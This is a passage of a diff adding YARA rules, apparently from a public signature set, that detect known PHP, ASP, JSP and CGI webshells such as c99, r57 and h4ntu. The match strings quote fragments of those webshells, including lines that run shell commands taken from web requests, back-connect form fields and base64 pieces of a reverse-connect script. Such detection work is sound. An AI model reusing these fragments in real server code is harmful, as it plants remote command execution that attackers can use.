+ $s1 = "However you are lucky :P"
+ $s2 = "I'm FuCKeD"
+ $s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
+ $s4 = "atrix@irc.brasnet.org"
+ condition:
+ 1 of them
+}
+rule php_include_w_shell_php {
+ meta:
+ description = "Semi-Auto-generated - file php-include-w-shell.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "4e913f159e33867be729631a7ca46850"
+ strings:
+ $s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
+ $s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
+ condition:
+ 1 of them
+}
+rule Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php {
+ meta:
+ description = "Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "6163b30600f1e80d2bb5afaa753490b6"
+ strings:
+ $s0 = "Safe0ver" fullword
+ $s1 = "Script Gecisi Tamamlayamadi!"
+ $s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
+ condition:
+ 1 of them
+}
+rule shell_php_php {
+ meta:
+ description = "Semi-Auto-generated - file shell.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "1a95f0163b6dea771da1694de13a3d8d"
+ strings:
+ $s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
+ $s2 = "$tmpfile = tempnam('/tmp', 'phpshell');"
+ $s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
+ condition:
+ 1 of them
+}
+rule telnet_cgi {
+ meta:
+ description = "Semi-Auto-generated - file telnet.cgi.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "dee697481383052980c20c48de1598d1"
+ strings:
+ $s0 = "www.rohitab.com"
+ $s1 = "W A R N I N G: Private Server"
+ $s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
+ $s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
+ condition:
+ 1 of them
+}
+rule ironshell_php {
+ meta:
+ description = "Semi-Auto-generated - file ironshell.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+ strings:
+ $s0 = "www.ironwarez.info"
+ $s1 = "$cookiename = \"wieeeee\";"
+ $s2 = "~ Shell I"
+ $s3 = "www.rootshell-team.info"
+ $s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
+ condition:
+ 1 of them
+}
+rule backdoorfr_php {
+ meta:
+ description = "Semi-Auto-generated - file backdoorfr.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "91e4afc7444ed258640e85bcaf0fecfc"
+ strings:
+ $s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
+ $s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"
+ condition:
+ 1 of them
+}
+rule aspydrv_asp {
+ meta:
+ description = "Semi-Auto-generated - file aspydrv.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "1c01f8a88baee39aa1cebec644bbcb99"
+ score = 60
+ strings:
+ $s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"
+ $s1 = "password"
+ $s2 = "session(\"shagman\")="
+ condition:
+ 2 of them
+}
+rule cmdjsp_jsp {
+ meta:
+ description = "Semi-Auto-generated - file cmdjsp.jsp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "b815611cc39f17f05a73444d699341d4"
+ strings:
+ $s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
+ $s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+ $s2 = "cmdjsp.jsp"
+ $s3 = "michaeldaw.org" fullword
+ condition:
+ 1 of them
+}
+rule h4ntu_shell__powered_by_tsoi_ {
+ meta:
+ description = "Semi-Auto-generated - file h4ntu shell [powered by tsoi].txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "06ed0b2398f8096f1bebf092d0526137"
+ strings:
+ $s0 = "h4ntu shell"
+ $s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
+ condition:
+ 1 of them
+}
+rule Ajan_asp {
+ meta:
+ description = "Semi-Auto-generated - file Ajan.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "b6f468252407efc2318639da22b08af0"
+ strings:
+ $s1 = "c:\\downloaded.zip"
+ $s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
+ $s3 = "http://www35.websamba.com/cybervurgun/"
+ condition:
+ 1 of them
+}
+rule PHANTASMA_php {
+ meta:
+ description = "Semi-Auto-generated - file PHANTASMA.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "52779a27fa377ae404761a7ce76a5da7"
+ strings:
+ $s0 = ">[*] Safemode Mode Run</DIV>"
+ $s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
+ $s2 = "[*] Spawning Shell"
+ $s3 = "Cha0s"
+ condition:
+ 2 of them
+}
+rule MySQL_Web_Interface_Version_0_8_php {
+ meta:
+ description = "Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "36d4f34d0a22080f47bb1cb94107c60f"
+ strings:
+ $s0 = "SooMin Kim"
+ $s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
+ $s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
+ $s3 = "<th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofi"
+ condition:
+ 2 of them
+}
+rule simple_cmd_html {
+ meta:
+ description = "Semi-Auto-generated - file simple_cmd.html.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "c6381412df74dbf3bcd5a2b31522b544"
+ strings:
+ $s1 = "<title>G-Security Webshell</title>" fullword
+ $s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+ $s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+ $s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+ condition:
+ all of them
+}
+rule _1_c2007_php_php_c100_php {
+ meta:
+ description = "Semi-Auto-generated - from files 1.txt, c2007.php.php.txt, c100.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
+ hash1 = "d089e7168373a0634e1ac18c0ee00085"
+ hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
+ strings:
+ $s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
+ $s3 = "echo \"<td> <a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+ condition:
+ 1 of them
+}
+rule _nst_php_php_img_php_php_nstview_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+ hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
+ hash2 = "4745d510fed4378e4b1730f56f25e569"
+ strings:
+ $s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
+ $s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
+ $s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
+ condition:
+ 1 of them
+}
+rule _network_php_php_xinfo_php_php_nfm_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
+ hash1 = "2601b6fc1579f263d2f3960ce775df70"
+ hash2 = "401fbae5f10283051c39e640b77e4c26"
+ strings:
+ $s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
+ $s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
+ condition:
+ all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SpecialShell_99_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash3 = "09609851caa129e40b0d56e90dfc476c"
+ strings:
+ $s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"
+ $s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
+ condition:
+ 1 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+ hash1 = "911195a9b7c010f61b66439d9048f400"
+ hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+ hash3 = "8023394542cddf8aee5dec6072ed02b5"
+ hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
+ hash5 = "817671e1bdc85e04cc3440bbd9288800"
+ strings:
+ $s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
+ $s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
+ condition:
+ 1 of them
+}
+rule _c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+ hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+ hash3 = "671cad517edd254352fe7e0c7c981c39"
+ strings:
+ $s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
+ $s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
+ $s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
+ condition:
+ 2 of them
+}
+rule _r577_php_php_spy_php_php_s_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+ hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
+ hash2 = "817671e1bdc85e04cc3440bbd9288800"
+ strings:
+ $s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
+ $s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
+ condition:
+ 1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php_ctt_sh_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+ hash5 = "09609851caa129e40b0d56e90dfc476c"
+ hash6 = "671cad517edd254352fe7e0c7c981c39"
+ strings:
+ $s0 = " if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""
+ $s1 = " if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"
+ $s2 = " echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"
+ $s3 = " elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"
+ condition:
+ all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+ hash5 = "09609851caa129e40b0d56e90dfc476c"
+ strings:
+ $s0 = "$sess_data[\"cut\"] = array(); c99_s"
+ $s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
+ condition:
+ 1 of them
+}
+rule _w_php_php_wacking_php_php_SpecialShell_99_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash2 = "09609851caa129e40b0d56e90dfc476c"
+ strings:
+ $s0 = "\"<td> <a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+ $s2 = "c99sh_sqlquery"
+ condition:
+ 1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+ hash4 = "09609851caa129e40b0d56e90dfc476c"
+ strings:
+ $s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
+ $s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
+ condition:
+ 1 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_spy_php_php_s_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+ hash1 = "911195a9b7c010f61b66439d9048f400"
+ hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+ hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+ hash4 = "817671e1bdc85e04cc3440bbd9288800"
+ strings:
+ $s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"
+ $s1 = ".$arrow.\"</b>\",in('text','"
+ condition:
+ 2 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+ hash1 = "911195a9b7c010f61b66439d9048f400"
+ hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+ strings:
+ $s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
+ $s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
+ $s2 = "rst.void.ru"
+ condition:
+ 3 of them
+}
+rule _r577_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+ hash1 = "8023394542cddf8aee5dec6072ed02b5"
+ hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+ hash3 = "817671e1bdc85e04cc3440bbd9288800"
+ strings:
+ $s0 = "echo ws(2).$lb.\" <a"
+ $s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
+ $s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
+ condition:
+ 2 of them
+}
+rule _wacking_php_php_1_SpecialShell_99_php_php_c100_php {
+ meta:
+ description = "Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
+ hash2 = "09609851caa129e40b0d56e90dfc476c"
+ hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
+ strings:
+ $s0 = "if(eregi(\"./shbd $por\",$scan))"
+ $s1 = "$_POST['backconnectip']"
+ $s2 = "$_POST['backcconnmsg']"
+ condition:
+ 1 of them
+}
+rule _r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+ hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+ hash2 = "8023394542cddf8aee5dec6072ed02b5"
+ hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+ hash4 = "817671e1bdc85e04cc3440bbd9288800"
+ strings:
+ $s1 = "if(rmdir($_POST['mk_name']))"
+ $s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
+ $s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
+ condition:
+ 2 of them
+}
+rule _w_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+ hash3 = "09609851caa129e40b0d56e90dfc476c"
+ strings:
+ $s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
+ $s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
+ $s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
+ condition:
+ 1 of them
+}
+rule _webadmin_php_php_iMHaPFtp_php_php_Private_i3lue_php {
+ meta:
+ description = "Semi-Auto-generated - from files webadmin.php.php.txt, iMHaPFtp.php.php.txt, Private-i3lue.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "b268e6fa3bf3fe496cffb4ea574ec4c7"
+ hash1 = "12911b73bc6a5d313b494102abcf5c57"
+ hash2 = "13f5c7a035ecce5f9f380967cf9d4e92"
+ strings:
+ $s0 = "return $type . $owner . $group . $other;" fullword
+ $s1 = "$owner = ($mode & 00400) ? 'r' : '-';" fullword
+ condition:
+ all of them
+}
+rule multiple_php_webshells {
+ meta:
+ description = "Semi-Auto-generated - from files multiple_php_webshells"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+ hash1 = "911195a9b7c010f61b66439d9048f400"
+ hash2 = "be0f67f3e995517d18859ed57b4b4389"
+ hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+ hash4 = "8023394542cddf8aee5dec6072ed02b5"
+ hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
+ hash6 = "817671e1bdc85e04cc3440bbd9288800"
+ hash7 = "7101fe72421402029e2629f3aaed6de7"
+ hash8 = "f618f41f7ebeb5e5076986a66593afd1"
+ strings:
+ $s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+ $s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"
+ $s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"
+ condition:
+ 2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ strings:
+ $s0 = "<b>Dumped! Dump has been writed to "
+ $s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
+ $s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
+ condition:
+ 1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+ strings:
+ $s0 = "@ini_set(\"highlight" fullword
+ $s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
+ $s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
+ condition:
+ 2 of them
+}
+rule _GFS_web_shell_ver_3_1_7___PRiV8_php_nshell_php_php_gfs_sh_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "be0f67f3e995517d18859ed57b4b4389"
+ hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+ hash2 = "f618f41f7ebeb5e5076986a66593afd1"
+ strings:
+ $s2 = "echo $uname.\"</font><br><b>\";" fullword
+ $s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
+ $s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
+ condition:
+ 2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash4 = "09609851caa129e40b0d56e90dfc476c"
+ strings:
+ $s0 = "c99ftpbrutecheck"
+ $s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
+ $s2 = "$fqb_lenght = $nixpwdperpage;" fullword
+ $s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
+ condition:
+ 2 of them
+}
+rule _w_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
+ hash4 = "09609851caa129e40b0d56e90dfc476c"
+ strings:
+ $s0 = "$sqlquicklaunch[] = array(\""
+ $s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
+ condition:
+ all of them
+}
+rule _antichat_php_php_Fatalshell_php_php_a_gedit_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
+ hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
+ hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
+ strings:
+ $s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
+ $s1 = "if($action==\"phpeval\"){" fullword
+ $s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
+ $s3 = "$dir=getcwd().\"/\";" fullword
+ condition:
+ 2 of them
+}
+rule _c99shell_v1_0_php_php_c99php_SsEs_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+ hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+ strings:
+ $s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
+ condition:
+ 1 of them
+}
+rule _Crystal_php_nshell_php_php_load_shell_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
